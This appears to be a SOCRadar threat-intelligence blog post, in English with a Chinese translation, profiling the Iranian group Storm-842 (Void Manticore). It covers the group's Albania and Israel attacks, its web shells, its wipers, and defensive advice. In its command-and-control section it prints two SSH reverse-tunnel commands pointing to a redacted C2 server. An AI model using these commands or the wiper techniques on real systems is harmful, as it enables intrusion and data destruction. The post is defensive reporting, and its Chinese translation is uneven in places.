Dark Web Profile: Storm-842 (Void Manticore)
暗网档案：Storm-842（虚空曼荼罗）

On September 23, 2022, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory addressing a series of cyberattacks against Albania’s government. The advisory identified the responsible party as ‘HomeLand Justice,’ a threat actor linked to the Iranian state.
2022 年 9 月 23 日，联邦调查局（FBI）和网络安全与基础设施安全局（CISA）发布了一项联合咨询，通报了针对阿尔巴尼亚政府的一系列网络攻击。咨询中指出责任方为‘HomeLand Justice’，这是一个与伊朗国家有关的威胁行为体。

The group launched its first attack on July 15, 2022, focusing on Albania’s e-government systems. This assault occurred just before a scheduled conference of the Iranian opposition group Mojahedin-e Khalq (MEK) (Persian: مجاهدین ِ خلق), which advocates for replacing Iran’s current regime. As a result, the conference was canceled. In September 2022, HomeLand Justice launched another campaign targeting Albanian border systems.
该组织于 2022 年 7 月 15 日发起了第一次攻击，目标是阿尔巴尼亚的电子政务系统。此次袭击发生在伊朗反对派组织人民圣战者组织（MEK）（波斯语：مجاهدین ِ خلق）计划召开的会议之前，该组织主张推翻伊朗现政权。因此，会议被取消。2022 年 9 月，HomeLand Justice 又发起了一次针对阿尔巴尼亚边境系统的攻击。

NetBlocks’ tweet about Albania’s network down
NetBlocks 关于阿尔巴尼亚网络中断的推文

Later, on December 24, 2023, the group announced their ongoing operations aimed at disrupting Albania’s infrastructure and government institutions. Lately, this group continued its pro-Iran stance by targeting Israel.
2023 年 12 月 24 日，该组织宣布其持续进行的行动旨在破坏阿尔巴尼亚的基础设施和政府机构。最近，该组织继续其亲伊朗立场，针对以色列采取行动。

For further information about the cyber attack on Albania back in 2022, check our related blog post.
有关 2022 年对阿尔巴尼亚的网络攻击的更多信息，请参阅我们的相关博客文章。

Who is Storm-842 (Void Manticore)?
谁是 Storm-842（虚空曼荼罗）？

Storm-842 (Void Manticore), an Iranian threat actor tied to the Ministry of Intelligence and Security (MOIS), specializes in destructive wiping attacks paired with influence campaigns.
Storm-842（Void Manticore），一个与伊朗情报和安全部（MOIS）有关的威胁行为者，专门从事破坏性清除攻击并配合影响力行动。

The group operates under multiple personas, most notably ‘Homeland Justice’ for operations in Albania and ‘Karma’ for activities in Israel, tailoring its approach to specific regions.Links between Void Manticore and Scarred Manticore (also known as OilRig, APT 34, Helix Kitten, or Chrysene) indicate a coordinated strategy within MOIS, often involving the transfer of victim targets.
该组织以多个身份运作，最著名的是在阿尔巴尼亚的行动中使用‘国土正义’和在以色列的活动中使用‘业力’，根据特定地区量身定制其方法。Void Manticore 和 Scarred Manticore（也被称为 OilRig、APT 34、Helix Kitten 或 Chrysene）之间的联系表明 MOIS 内部存在协调策略，通常涉及受害者目标的转移。

Illustration by BING AI
插图由 BING AI 提供

According to researchers, Void Manticore has established itself as a major threat to those opposing Iranian interests. Known for combining destructive wiping attacks with advanced influence operations, the group employs a dual strategy of psychological warfare and data destruction.
据研究人员称，Void Manticore 已经成为反对伊朗利益的重大威胁。该组织以结合破坏性清除攻击和高级影响行动而闻名，采用心理战和数据销毁的双重策略。

A key element of Void Manticore’s activity is its collaboration with Scarred Manticore, another MOIS-linked Iranian threat actor. Evidence points to a systematic transfer of targets between the two groups, reflecting a coordinated approach to executing destructive campaigns.
Void Manticore 活动的一个关键要素是其与另一家与伊朗情报部（MOIS）有关的威胁行为者 Scarred Manticore 的合作。证据表明，这两个团体之间存在系统性的目标转移，反映出在执行破坏性行动方面有协调一致的方法。

In this process, Scarred Manticore typically infiltrates and exfiltrates data from victim networks before passing control to Void Manticore, which carries out the destructive phase.
在这个过程中，Scarred Manticore 通常会渗透并从受害网络中提取数据，然后再将控制权移交给 Void Manticore，后者执行破坏阶段。
This partnership not only magnifies the impact of their attacks but also creates significant challenges for cybersecurity defenders.
这种伙伴关系不仅放大了他们攻击的影响，还为网络安全防御者创造了重大挑战。

By pooling resources and expertise, Void Manticore and its affiliates conduct sophisticated cyber operations with extensive consequences.
通过整合资源和专业知识，Void Manticore 及其附属机构进行复杂的网络操作，产生了广泛的影响。
Their collaboration enhances Void Manticore’s reach and demonstrates a level of complexity that surpasses the capabilities of individual groups.
他们的合作增强了虚空曼蒂科雷的影响力，展示了一种超越单个组织能力的复杂性水平。

A high-level timeline of the Void-Scarred Manticores connection (Check Point)
虚空疤痕曼蒂科尔斯连接的高层次时间线（检查点）

This coordinated handoff aligns with Microsoft’s findings in 2022, highlighting similar tactics in the operational structure.
这种协调的交接与微软在 2022 年的发现相吻合，突显了操作结构中的类似战术。

How Do They Operate?
他们如何运作？

Storm-0842’s activities are methodical and targeted, showcasing a high degree of technical expertise and strategic coordination.
Storm-0842 的活动有条不紊且有针对性，展示了高度的技术专长和战略协调。

At the heart of Storm-0842’s operational arsenal is its use of custom-developed wiper malware. This malware is engineered to delete files, disrupt networked storage, and render systems inoperable. By designing wipers compatible with both Windows and Linux environments, Storm-0842 ensures its campaigns can impact a wide range of infrastructures.
Storm-0842 操作武器库的核心是其使用的定制开发的擦除器恶意软件。这种恶意软件旨在删除文件、破坏网络存储并使系统无法操作。通过设计与 Windows 和 Linux 环境兼容的擦除器，Storm-0842 确保其行动能够影响广泛的基础设施。
These attacks are typically accompanied by deliberate manipulations of shared drives and boot processes, further complicating recovery efforts. Such precision and adaptability underscore the group’s advanced technical sophistication.
这些攻击通常伴随着对共享驱动器和启动过程的故意操纵，进一步复杂化恢复工作。这种精确性和适应性突显了该组织先进的技术 sophistication。

Beyond its destructive payloads, Storm-0842 conducts influence operations that amplify the impact of its cyberattacks. These campaigns involve leaking stolen data through various online personas, including ‘Homeland Justice’ in Albania and ‘Karma’ in Israel.
除了其破坏性有效载荷外，Storm-0842 还进行影响操作，放大其网络攻击的影响。这些活动包括通过各种在线身份泄露被盗数据，包括在阿尔巴尼亚的“Homeland Justice”和在以色列的“Karma”。
By strategically releasing sensitive information, the group sows distrust and chaos, aligning public perception with its objectives. These tactics are not merely byproducts of its operations but integral components of its strategy, blending technical and psychological warfare.
通过有策略地发布敏感信息，该组织播下不信任和混乱的种子，使公众认知与其目标一致。这些战术不仅是其行动的副产品，更是其战略的重要组成部分，结合了技术战和心理战。

As stated above, one of Storm-0842’s defining characteristics is its collaboration with other MOIS-linked groups, particularly Scarred Manticore. This partnership involves a systematic handoff of operations.
如上所述，Storm-0842 的一个显著特征是与其它 MOIS 相关团体，特别是 Scarred Manticore 的合作。这种合作关系涉及操作的系统性交接。
Scarred Manticore typically gains initial access to targeted networks, exfiltrating sensitive data and mapping the environment. Control is then transitioned to Storm-0842, which executes the destructive phase, leveraging the gathered intelligence to maximize impact.
Scarred Manticore 通常会获得对目标网络的初始访问权限，窃取敏感数据并映射环境。然后控制权转移给 Storm-0842，其执行破坏性阶段，利用收集到的情报来最大化影响。
This coordinated approach enables both groups to conduct seamless, multifaceted campaigns while complicating attribution efforts.
这种协调一致的方法使两个群体能够开展无缝、多层面的运动，同时使归因工作复杂化。

A case study of Storm-0842’s operations is the attack on the Albanian government in mid-2022.
Storm-0842 行动的一个案例研究是 2022 年中期对阿尔巴尼亚政府的攻击。
According to detailed analyses, including advisories from CISA and Microsoft, the group leveraged previously compromised accounts and vulnerabilities in unpatched systems to deliver its payloads.
根据详细分析，包括 CISA 和微软的咨询意见，该组织利用之前被 compromized 的账户和未打补丁系统中的漏洞来交付其有效载荷。
The attack disrupted critical government services, including e-government portals and border management systems. The follow-up phase saw the strategic release of stolen data through ‘Homeland Justice,’ designed to undermine the Albanian government’s credibility and disrupt diplomatic relations with Iran.
此次攻击扰乱了关键政府服务，包括电子政务门户网站和边境管理系统。后续阶段通过“Homeland Justice”有策略地释放被盗数据，旨在削弱阿尔巴尼亚政府的公信力并破坏与伊朗的外交关系。

Attack on Albania included a ransomware-style file encryptor and disk wiping malware
对阿尔巴尼亚的攻击包括勒索软件风格的文件加密程序和磁盘擦除恶意软件

Key to the attack’s success was Storm-0842’s ability to exploit vulnerabilities in widely-used software platforms and its use of credential-harvesting techniques.
攻击成功的关键在于 Storm-0842 能够利用广泛使用的软件平台中的漏洞及其使用凭证收集技术。
The group employed a range of TTPs (Tactics, Techniques, and Procedures), including the deployment of web shells for persistence, lateral movement within compromised networks, and the use of RDP (Remote Desktop Protocol) for remote access. Additionally, the group demonstrated significant operational planning, timing the attacks to coincide with political events, such as a planned conference of the Iranian opposition group MEK, further enhancing their strategic impact.
该组织采用了多种 TTP（战术、技术和程序），包括部署 web shell 以实现持久性，在被攻破的网络中进行横向移动，以及使用 RDP（远程桌面协议）进行远程访问。此外，该组织还展示了显著的操作规划能力，将攻击时间与政治事件同步，例如伊朗反对派组织 MEK 计划召开的会议，进一步增强了其战略影响。

Storm-0842’s operations extend beyond technical attacks, reflecting a broader alignment with Iranian geopolitical objectives.
Storm-0842 的行动超出了技术攻击的范围，反映了与伊朗地缘政治目标更广泛的契合。
Its campaigns demonstrate a high degree of coordination, leveraging multiple threat actors, advanced malware, and psychological operations to achieve maximum disruption. As the latest research shows, in a Cyber Kill Chain flow their operations can be summarized as below:
其活动展示了高度的协调性，利用多个威胁行为者、高级恶意软件和心理战来实现最大破坏。根据最新研究显示，在网络杀伤链流程中，其操作可以概括为以下：

Reconnaissance  侦察

• The group identifies targets, such as entities in Israel and Albania, with an intent to perform destructive operations.
  该组织确定了目标，例如以色列和阿尔巴尼亚的实体，意图进行破坏性行动。
• Likely uses publicly available tools or compromised credentials handed off by other threat actors to initiate access.
  可能使用公开可用的工具或由其他威胁参与者提供的泄露的凭证来发起访问。

Weaponization  武器化

• Custom web shells, such as “Karma Shell,” are prepared for exploitation.
  自定义的 web shell，例如“Karma Shell”，已经准备好用于利用。
  • Functions include directory listing, file uploads, service manipulation, and process creation.
    功能包括目录列表、文件上传、服务操作和进程创建。
  • Uses base64 and a one-byte XOR for obfuscation of parameters.
    使用 base64 和一字节 XOR 对参数进行混淆。
• Wipers are developed for specific objectives:
  雨刷是为特定目标开发的：
  • Cl Wiper: Wipes using ElRawDisk driver with commands to delete partitions.
    Cl Wiper：使用 ElRawDisk 驱动程序和删除分区的命令进行擦除。
  • Partition Wipers: Removes disk partition layouts, causing system crashes.
    分区清除工具：移除磁盘分区布局，导致系统崩溃。
  • BiBi Wiper: Targets files and partitions, with variants for Linux and Windows systems.
    BiBi 清除工具：针对文件和分区，有适用于 Linux 和 Windows 系统的变种。

Delivery  配送

• Initial access is often achieved through internet-facing web servers.
  初始访问通常通过面向互联网的 Web 服务器实现。
• Deployment of malicious payloads like “do.exe” via web shells and other upload mechanisms.
  通过网页外壳和其他上传机制部署恶意有效负载，如“do.exe”。

Exploitation  剥削

• Utilizes exploits on compromised servers to establish control, such as:
  利用受感染服务器上的漏洞来建立控制，例如：
  • Executing commands.  执行命令。
  • Uploading and deploying secondary payloads (e.g., reGeorge tunneling web shell).
    上传和部署次级有效负载（例如，reGeorge 隧道网络外壳）。

Installation  安装

• Deploys persistence tools, including:
  部署持久性工具，包括：
  • Web shells like “Karma Shell” and “reGeorge” for sustained access.
    Web Shells 如“Karma Shell”和“reGeorge”用于持续访问。
  • “do.exe” for checking Domain Admin credentials and dropping additional tools.
    “do.exe” 用于检查域管理员凭据并投放额外工具。
  • Establishes SSH-based C2 channels with compromised hosts.
    与受感染主机建立基于 SSH 的 C2 通道。

Command and Control (C2)  指挥与控制（C2）

Configures SOCKS proxying for lateral movement via OpenSSH client, like:
配置 SOCKS 代理以通过 OpenSSH 客户端进行横向移动，例如：

ssh root@REDACTED_C2_SERVER -R 1090 -p 443 -o ServerAliveInterval=60

ssh root@REDACTED_C2_SERVER -R 1080 -p 443 -o ServerAliveInterval=60

Actions on Objectives  针对目标的行动

• Executes destructive activities aimed at data destruction and disruption:
  执行旨在破坏数据和造成破坏的活动：
  • Automated and Manual Wiping:
    自动和手动擦拭：
    • Custom wipers selectively corrupt files or obliterate partition tables.
      自定义清除程序有选择地破坏文件或清除分区表。
    • Uses utilities like SDelete, Windows Format Utility, and manual deletion via File Explorer.
      使用像 SDelete、Windows 磁盘格式化工具和通过文件资源管理器手动删除这样的实用工具。
  • Targeted Campaigns:  针对性活动：
    • Linux variant of BiBi Wiper corrupts files and renames them with the “.BiBi” extension.
      Linux 版本的 BiBi Wiper 会破坏文件并将它们重命名为带有“.BiBi”扩展名的文件。
    • Windows variant disables recovery mechanisms and deletes shadow copies to evade restoration.
      Windows 变种禁用恢复机制并删除阴影副本以逃避还原。
    • Newer variants avoid detection with updated extensions and behavior.
      较新的变种通过更新扩展和行为来避免被检测。
  • Destruction targeted at critical data and system integrity.
    针对关键数据和系统完整性的破坏。

How to Protect Your Organization from an Iranian APT Attack?
如何保护您的组织免受伊朗 APT 攻击？

Iranian APT groups like Storm-842 (Void Manticore) leverage advanced Tactics, Techniques, and Procedures (TTPs) to carry out destructive cyberattacks. To protect your organization, consider the following measures based on recommendations from CISA and industry best practices:
伊朗的 APT 组织，如 Storm-842（Void Manticore），利用先进的战术、技术和程序（TTP）来实施破坏性网络攻击。为了保护您的组织，请考虑以下基于 CISA 和行业最佳实践建议的措施：

1. Strengthen Access Controls
1. 加强访问控制

• Implement Multi-Factor Authentication (MFA): Require MFA for all remote access to critical systems and applications.
  实施多因素认证（MFA）：要求对所有远程访问关键系统和应用程序进行多因素认证。
• Limit Privileged Access: Use role-based access controls and limit administrative privileges to minimize the impact of compromised credentials.
  限制特权访问：使用基于角色的访问控制，限制管理权限，以最小化凭据泄露的影响。

2. Patch Management and Vulnerability Remediation
2. 补丁管理和漏洞修复

• Prioritize Patch Management: Regularly update software, operating systems, and applications to address known vulnerabilities.
  优先处理补丁管理：定期更新软件、操作系统和应用程序以解决已知漏洞。
• Monitor for Unpatched Systems: Use vulnerability management tools to identify and remediate exposed systems.
  监控未打补丁的系统：使用漏洞管理工具来识别和修复暴露的系统。

3. Network Segmentation and Monitoring
3. 网络分段和监控

• Isolate Critical Assets: Implement network segmentation to limit lateral movement in case of a breach.
  隔离关键资产：实施网络分段，以限制在发生安全事件时的横向移动。
• Monitor for Anomalies: Deploy Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) to identify unusual behavior.
  监控异常：部署入侵检测系统（IDS）和入侵防御系统（IPS）以识别异常行为。

4. Enhance Email and Web Security
4. 强化电子邮件和网页安全

• Filter Malicious Content: Use email gateways to block phishing attempts and malware-laden attachments.
  过滤恶意内容：使用电子邮件网关阻止网络钓鱼尝试和携带恶意软件的附件。
• Inspect Internet Traffic: Implement web filtering to prevent access to known malicious domains.
  检查互联网流量：实施网页过滤，防止访问已知的恶意域名。

5. Backup and Recovery  5. 备份和恢复

• Maintain Regular Backups: Ensure that backups are up-to-date and stored offline or in secure cloud environments.
  保持定期备份：确保备份是最新的，并存储在离线或安全的云环境中。
• Test Recovery Plans: Conduct periodic recovery drills to ensure quick restoration in case of an attack.
  测试恢复计划：定期进行恢复演练，以确保在遭受攻击时能够快速恢复。

6. Incident Response and Threat Intelligence
6. 事件响应和威胁情报

• Develop Incident Response Plans: Establish clear protocols for detecting, containing, and mitigating cyberattacks.
  制定事件响应计划：建立清晰的协议，用于检测、遏制和缓解网络攻击。
• Leverage Threat Intelligence: Subscribe to threat intelligence feeds to stay informed about evolving Iranian APT TTPs.
  利用威胁情报：订阅威胁情报源，以了解不断演变的伊朗 APT 战术、技术和程序（TTP）。

7. Employee Training and Awareness
7. 员工培训和意识

• Educate Staff: Train employees to recognize phishing attempts and suspicious activities.
  培训员工识别网络钓鱼企图和可疑活动。
• Simulate Attacks: Conduct regular phishing simulations to assess and improve readiness.
  模拟攻击：定期进行网络钓鱼模拟，以评估和提高准备状态。

How Can SOCRadar Help?
SOCRadar 如何提供帮助？

SOCRadar offers a comprehensive suite of tools to help organizations defend against sophisticated threats like those posed by Storm-842 (Void Manticore).
SOCRadar 提供了一套全面的工具，帮助组织防御 Storm-842（Void Manticore）等复杂威胁。
With its advanced threat intelligence and proactive monitoring capabilities, SOCRadar enables businesses to stay ahead of cyberattacks and mitigate risks associated with Iranian APT groups.
借助其高级威胁情报和主动监控功能，SOCRadar 使企业能够领先于网络攻击并减轻与伊朗 APT 组织相关的风险。

One of SOCRadar’s key strengths is its real-time threat intelligence, which continuously tracks the Tactics, Techniques, and Procedures (TTPs) of groups like Void Manticore. By identifying Indicators of Compromise (IOCs) and monitoring the activities of threat actors across the dark web and other cyber threat landscapes, SOCRadar helps organizations recognize potential risks before they escalate into full-blown attacks.
SOCRadar 的一个关键优势在于其实时威胁情报，能够持续跟踪像 Void Manticore 这样的组织的战术、技术和程序（TTP）。通过识别妥协指标（IOC）并监控暗网及其他网络威胁环境中的威胁行为者的活动，SOCRadar 帮助组织在威胁升级为全面攻击之前识别潜在风险。

Check SOCRadar’s Threat Intelligence for IoCs, YARA Rules and more,both for HomeLand Justice and Void Manticore
检查 SOCRadar 的威胁情报以获取 IoCs、YARA 规则等，既适用于 HomeLand Justice 也适用于 Void Manticore

SOCRadar also aids in Vulnerability Management by identifying unpatched systems and providing actionable recommendations for remediation. This ensures that critical vulnerabilities, often exploited by APT groups, are addressed promptly.
SOCRadar 还通过识别未打补丁的系统并提供可操作的修复建议来辅助漏洞管理。这确保了关键漏洞（通常被高级持续性威胁集团利用）得到及时处理。

The platform’s Dark Web Monitoring capabilities offer a proactive approach to security by tracking leaked credentials, sensitive data, and potential discussions about targeted attacks.
该平台的暗网监控功能通过跟踪泄露的凭证、敏感数据和针对攻击的潜在讨论，提供了一种主动的安全方法。
By monitoring underground forums and marketplaces, SOCRadar helps detect and respond to data breaches or attacks in their early stages.
通过监控地下论坛和市场，SOCRadar 有助于在早期阶段检测和响应数据泄露或攻击。

In addition, SOCRadar’s Digital Risk Protection tools help defend against phishing campaigns, credential harvesting, and domain impersonation—common tactics used by groups like Void Manticore. This service ensures that organizations’ brands and digital assets remain secure from fraudulent activities.
此外，SOCRadar 的数字风险保护工具帮助防御网络钓鱼活动、凭证收集和域名假冒——这些是像 Void Manticore 这样的组织常用的手法。这项服务确保组织的品牌和数字资产免受欺诈活动的侵害。

In Summary  总之

The threat posed by Iranian APT groups like Storm-842 (Void Manticore) is significant, with their highly coordinated and destructive cyber operations targeting critical infrastructure, government institutions, and geopolitical adversaries.
伊朗的 APT 组织（如 Storm-842(Void Manticore)）所构成的威胁是重大的，其高度协调且具有破坏性的网络行动针对关键基础设施、政府机构和地缘政治对手。
These groups, backed by state intelligence agencies, use a combination of advanced malware, wiper tools, and psychological influence campaigns to disrupt and destroy systems, often tailoring their tactics to specific regions or political events.
这些组织在国家情报机构的支持下，利用高级恶意软件、破坏工具和心理影响行动相结合的方式扰乱和摧毁系统，通常根据特定地区或政治事件量身定制其战术。

To protect against such attacks, organizations must adopt a proactive approach, leveraging advanced threat intelligence to stay informed of evolving tactics and potential risks.
为了防范此类攻击，组织必须采取主动的方法，利用高级威胁情报来掌握不断演变的战术和潜在风险。
SOCRadar’s platform plays a key role in this defense by providing real-time threat intelligence, vulnerability management, and dark web monitoring, helping organizations detect and mitigate threats early.
SOCRadar 的平台通过提供实时威胁情报、漏洞管理和暗网监控，在这一防御中发挥着关键作用，帮助组织尽早检测和缓解威胁。
Its incident response capabilities ensure that, in the event of an attack, organizations can quickly contain and recover from disruptions, minimizing the impact on operations.
其事件响应能力确保在发生攻击时，组织能够快速遏制和从破坏中恢复，将对运营的影响降到最低。

By integrating SOCRadar’s comprehensive cybersecurity solutions, organizations can better defend themselves against the sophisticated tactics employed by APT groups like Storm-842, ensuring that they are always prepared to respond to emerging threats in an increasingly complex and dangerous digital landscape.
通过整合 SOCRadar 的全面网络安全解决方案，组织可以更好地防御 APT 组织（如 Storm-842）所采用的复杂战术，确保他们始终能够应对日益复杂和危险的数字环境中出现的新威胁。